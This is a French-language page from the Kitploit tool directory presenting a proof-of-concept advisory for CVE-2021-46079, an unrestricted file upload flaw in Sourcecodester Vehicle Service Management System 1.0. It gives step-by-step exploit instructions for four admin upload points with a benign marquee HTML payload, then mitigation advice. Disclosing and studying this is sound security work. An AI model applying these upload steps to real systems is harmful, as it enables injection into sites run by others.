Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection — CVE-2021-46079 - Une vulnérabilité de téléchargement de fichier sans restriction existe dans Sourcecodester Vehicle Service Management System 1.0. Un attaquant distant peut télécharger des fichiers malveillants menant à une injection HTML. | Kitploit
Outils/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection

CVE-2021-46079 - Une vulnérabilité de téléchargement de fichier sans restriction existe dans Sourcecodester Vehicle Service Management System 1.0. Un attaquant distant peut télécharger des fichiers malveillants menant à une injection HTML.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-46079

Titre de l'exploit: Vehicle Service Management System - Téléchargement de fichiers 'Multiples' conduit à une injection HTML

Auteur de l'exploit: SANU P.L

CVE: CVE-2021-46079

CVSS : 7.2 ÉLEVÉ

Références :

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46079
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46079

Description :

Une vulnérabilité de téléchargement de fichiers sans restriction existe dans Sourcecodester Vehicle Service Management System 1.0. Un attaquant distant peut télécharger des fichiers malveillants conduisant à une injection HTML.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section My Account http://localhost/vehicle_service/admin/?page=user

Charge utile :

<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Enregistrez le code HTML ci-dessus, par exemple : Html Injection.html
  2. Dans la section My Account, saisissez tous les détails requis et parcourez le fichier HTML dans Avatar.
  3. Cliquez sur le bouton de mise à jour.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. L'injection HTML est exécutée.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section User List et cliquez sur le bouton Create New.

Charge utile :

<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Enregistrez le code HTML ci-dessus, par exemple : Html Injection.html
  2. Dans la page Create New User, saisissez tous les détails requis et parcourez le fichier HTML dans Avatar.
  3. Cliquez sur le bouton Save.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. L'injection HTML est exécutée.

3. Vehicle Service Management System - 'Paramètres - Logo du système' (/admin/?page=system_info)

Charge utile :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Settings http://localhost/vehicle_service/admin/?page=system_info

Charge utile :

<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Enregistrez le code HTML ci-dessus, par exemple : Html Injection.html
  2. Dans la section Settings, saisissez tous les détails requis et parcourez le fichier HTML dans System Logo.
  3. Cliquez sur le bouton de mise à jour.
  4. Ouvrez l'image System Logo dans un nouvel onglet.
  5. L'injection HTML est exécutée.

4. Vehicle Service Management System - 'Paramètres - Couverture du site Web' (/admin/?page=system_info)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Settings http://localhost/vehicle_service/admin/?page=system_info

Charge utile :

<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Enregistrez le code HTML ci-dessus, par exemple : Html Injection.html
  2. Dans la section Settings, saisissez tous les détails requis et parcourez le fichier HTML dans Website Cover.
  3. Cliquez sur le bouton de mise à jour.
  4. Ouvrez l'image Website Cover dans un nouvel onglet.
  5. L'injection HTML est exécutée.

Impact :

Un attaquant peut télécharger un fichier malveillant sur plusieurs points de terminaison, ce qui conduit à une injection HTML.

Atténuation :

Il est recommandé de mettre en œuvre les mesures suivantes :

  • N'accepter jamais un nom de fichier et son extension directement sans avoir une liste blanche de filtrage.
  • S'il n'est pas nécessaire d'avoir des caractères Unicode, il est fortement recommandé d'accepter uniquement des caractères alphanumériques et un seul point comme entrée pour le nom de fichier et l'extension.
  • Limiter la taille du fichier à une valeur maximale afin d'empêcher les attaques par déni de service.
  • Le répertoire de téléchargement ne doit avoir aucune permission 'execute'.
  • Ne comptez pas uniquement sur la validation côté client.
Télécharger l’outil